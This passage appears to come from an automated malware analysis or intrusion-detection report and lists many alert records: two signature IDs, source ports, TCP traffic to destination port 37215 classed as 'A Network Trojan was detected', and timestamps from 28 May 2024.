            SID:2829579
            Source Port:58224
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.741944
            SID:2835222
            Source Port:49206
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.776729
            SID:2835222
            Source Port:42404
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.930048
            SID:2835222
            Source Port:60402
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.300317
            SID:2829579
            Source Port:45428
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.618114
            SID:2829579
            Source Port:45524
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.917367
            SID:2835222
            Source Port:49756
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.040290
            SID:2835222
            Source Port:43852
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.491363
            SID:2835222
            Source Port:51480
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:27.170103
            SID:2829579
            Source Port:42996
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:22.062177
            SID:2835222
            Source Port:46614
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:47.602390
            SID:2829579
            Source Port:51812
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.078510
            SID:2835222
            Source Port:39984
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.732703
            SID:2835222
            Source Port:40824
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.770810
            SID:2829579
            Source Port:45086
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.061382
            SID:2835222
            Source Port:50888
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.525647
            SID:2835222
            Source Port:52256
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.834486
            SID:2829579
            Source Port:51918
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.809146
            SID:2835222
            Source Port:43678
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.919754
            SID:2829579
            Source Port:55572
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.732798
            SID:2829579
            Source Port:52098
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.987509
            SID:2829579
            Source Port:51136
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.733333
            SID:2829579
            Source Port:44322
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.812112
            SID:2829579
            Source Port:43762
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.766850
            SID:2835222
            Source Port:40614
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.810526
            SID:2829579
            Source Port:59056
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.511727
            SID:2829579
            Source Port:52548
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.064980
            SID:2835222
            Source Port:34630
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.868723
            SID:2829579
            Source Port:48916
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.559811
            SID:2835222
            Source Port:58422
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.809200
            SID:2829579
            Source Port:52786
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.610150
            SID:2829579
            Source Port:59276
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.880098
            SID:2829579
            Source Port:48000
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.894616
            SID:2835222
            Source Port:50624
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.384656
            SID:2829579
            Source Port:35894
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.811297
            SID:2835222
            Source Port:54516
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.810840
            SID:2835222
            Source Port:48348
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.298301
            SID:2835222
            Source Port:46860
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.869942
            SID:2835222
            Source Port:43786
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.818362
            SID:2829579
            Source Port:34160
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.069115
            SID:2829579
            Source Port:37580
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.559039
            SID:2829579
            Source Port:41124
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:09.883429
            SID:2829579
            Source Port:36864
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:32.414298
            SID:2829579
            Source Port:40480
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507095
            SID:2829579
            Source Port:54326
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.777467
            SID:2835222
            Source Port:51068
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.649711
            SID:2835222
            Source Port:36800
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.506824
            SID:2835222
            Source Port:49564
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.775710
            SID:2829579
            Source Port:47396
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.326879
            SID:2829579
            Source Port:38638
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.765782
            SID:2835222
            Source Port:40836
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.812055
            SID:2829579
            Source Port:48250
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.068174
            SID:2829579
            Source Port:48132
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.819737
            SID:2829579
            Source Port:59032
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.935251
            SID:2835222
            Source Port:41112
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.459639
            SID:2829579
            Source Port:59796
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.675566
            SID:2829579
            Source Port:54430
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.508327
            SID:2829579
            Source Port:32852
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.485533
            SID:2829579
            Source Port:52438
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.509838
            SID:2835222
            Source Port:36338
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.423275
            SID:2835222
            Source Port:55638
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.809765
            SID:2829579
            Source Port:58790
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.868136
            SID:2835222
            Source Port:55658
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.880575
            SID:2829579
            Source Port:56514
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.057841
            SID:2829579
            Source Port:44956
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.330922
            SID:2835222
            Source Port:37672
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.764305
            SID:2835222
            Source Port:51472
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.334123
            SID:2835222
            Source Port:34152
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.895875
            SID:2835222
            Source Port:42596
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.326169
            SID:2829579
            Source Port:54770
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.822120
            SID:2835222
            Source Port:33312
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.586659
            SID:2835222
            Source Port:43038
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.734685
            SID:2835222
            Source Port:53748
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.914531
            SID:2829579
            Source Port:49750
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.866114
            SID:2829579
            Source Port:48298
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.061123
            SID:2829579
            Source Port:34904
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.940279
            SID:2829579
            Source Port:48466
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.005344
            SID:2835222
            Source Port:44290
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.713215
            SID:2829579
            Source Port:57486
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.984808
            SID:2829579
            Source Port:50798
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.861362
            SID:2829579
            Source Port:41202
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.900055
            SID:2829579
            Source Port:46162
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:51.670980
            SID:2829579
            Source Port:49040
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.067751
            SID:2835222
            Source Port:42916
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.384630
            SID:2835222
            Source Port:46868
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.850932
            SID:2829579
            Source Port:38038
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.309663
            SID:2829579
            Source Port:48486
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.837266
            SID:2835222
            Source Port:45326
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.924147
            SID:2835222
            Source Port:33102
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.435628
            SID:2835222
            Source Port:59848
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.051223
            SID:2829579
            Source Port:53522
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.809728
            SID:2835222
            Source Port:38162
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.916493
            SID:2835222
            Source Port:35330
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.960779
            SID:2835222
            Source Port:46986
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.334104
            SID:2835222
            Source Port:59468
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.745644
            SID:2835222
            Source Port:45520
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.953671
            SID:2829579
            Source Port:51200
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:43.587498
            SID:2829579
            Source Port:57820
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.047552
            SID:2835222
            Source Port:48938
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.847838
            SID:2829579
            Source Port:58684
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.860490
            SID:2829579
            Source Port:53770
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.996672
            SID:2835222
            Source Port:51830
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.862291
            SID:2835222
            Source Port:40976
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.767251
            SID:2835222
            Source Port:38850
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.815071
            SID:2835222
            Source Port:51164
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:31.392781
            SID:2829579
            Source Port:48432
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.760170
            SID:2835222
            Source Port:40546
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:50.658041
            SID:2835222
            Source Port:59026
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.730369
            SID:2829579
            Source Port:50510
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.333908
            SID:2829579
            Source Port:51002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.861856
            SID:2835222
            Source Port:58814
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.276780
            SID:2829579
            Source Port:36362
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.871068
            SID:2829579
            Source Port:60104
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.753422
            SID:2829579
            Source Port:55662
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.476797
            SID:2835222
            Source Port:39134
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.055142
            SID:2829579
            Source Port:52170
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.559339
            SID:2829579
            Source Port:39042
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.948400
            SID:2835222
            Source Port:43452
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.988660
            SID:2829579
            Source Port:40912
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.965216
            SID:2829579
            Source Port:47508
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.068434
            SID:2835222
            Source Port:38262
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:19.073055
            SID:2829579
            Source Port:57886
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.289598
            SID:2835222
            Source Port:52932
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.445226
            SID:2835222
            Source Port:48430
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.871280
            SID:2835222
            Source Port:54302
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.052402
            SID:2835222
            Source Port:42856
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.696288
            SID:2829579
            Source Port:36920
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.768067
            SID:2835222
            Source Port:41324
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.880361
            SID:2835222
            Source Port:52380
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507969
            SID:2835222
            Source Port:59188
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.883371
            SID:2829579
            Source Port:40536
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.846731
            SID:2829579
            Source Port:49594
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.863440
            SID:2835222
            Source Port:55660
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.905463
            SID:2829579
            Source Port:45078
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.153215
            SID:2829579
            Source Port:44824
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.869848
            SID:2835222
            Source Port:52998
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.930432
            SID:2835222
            Source Port:33338
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.500143
            SID:2835222
            Source Port:44644
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.828746
            SID:2829579
            Source Port:55678
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.730642
            SID:2835222
            Source Port:47050
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:32.386707
            SID:2829579
            Source Port:59688
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.810662
            SID:2829579
            Source Port:39714
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:33.396676
            SID:2835222
            Source Port:55716
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.986781
            SID:2835222
            Source Port:37192
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.887467
            SID:2835222
            Source Port:36734
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.559438
            SID:2835222
            Source Port:34512
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.923889
            SID:2829579
            Source Port:59112
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.277944
            SID:2835222
            Source Port:57640
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.349305
            SID:2835222
            Source Port:51446
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.739481
            SID:2835222
            Source Port:44882
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.185466
            SID:2835222
            Source Port:42406
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.903290
            SID:2835222
            Source Port:36378
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.919879
            SID:2829579
            Source Port:57444
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.091967
            SID:2835222
            Source Port:37040
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.070586
            SID:2835222
            Source Port:48670
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.778209
            SID:2829579
            Source Port:33086
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.031493
            SID:2829579
            Source Port:34848
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.894187
            SID:2829579
            Source Port:57960
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.040333
            SID:2829579
            Source Port:38576
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.350703
            SID:2829579
            Source Port:54124
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.058614
            SID:2829579
            Source Port:43088
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.869710
            SID:2829579
            Source Port:55614
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.047814
            SID:2835222
            Source Port:40732
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.730665
            SID:2829579
            Source Port:33376
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.070322
            SID:2829579
            Source Port:50260
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.655462
            SID:2835222
            Source Port:60876
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.730478
            SID:2829579
            Source Port:60502
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.776866
            SID:2835222
            Source Port:47402
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.706785
            SID:2835222
            Source Port:60484
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.866468
            SID:2829579
            Source Port:39756
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507059
            SID:2829579
            Source Port:53776
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.045742
            SID:2835222
            Source Port:38250
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.804450
            SID:2835222
            Source Port:47268
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.961162
            SID:2835222
            Source Port:59762
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.826119
            SID:2829579
            Source Port:50714
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.764768
            SID:2829579
            Source Port:34178
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.290793
            SID:2835222
            Source Port:43706
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.061359
            SID:2835222
            Source Port:34592
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.002453
            SID:2835222
            Source Port:48938
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.066644
            SID:2835222
            Source Port:54694
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.273409
            SID:2835222
            Source Port:56392
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.760190
            SID:2829579
            Source Port:42224
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.707112
            SID:2835222
            Source Port:39858
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.927605
            SID:2829579
            Source Port:40206
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.644040
            SID:2835222
            Source Port:59234
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.917718
            SID:2835222
            Source Port:36594
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.811309
            SID:2829579
            Source Port:40520
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.837003
            SID:2829579
            Source Port:52138
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.928761
            SID:2835222
            Source Port:43014
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.038139
            SID:2835222
            Source Port:51466
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.731237
            SID:2829579
            Source Port:36284
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.882206
            SID:2829579
            Source Port:32774
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.753294
            SID:2829579
            Source Port:55310
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.056925
            SID:2829579
            Source Port:38174
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.869775
            SID:2835222
            Source Port:44178
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.440827
            SID:2835222
            Source Port:34242
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.985472
            SID:2829579
            Source Port:52900
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:34.432727
            SID:2835222
            Source Port:39614
            Destination Port:37215
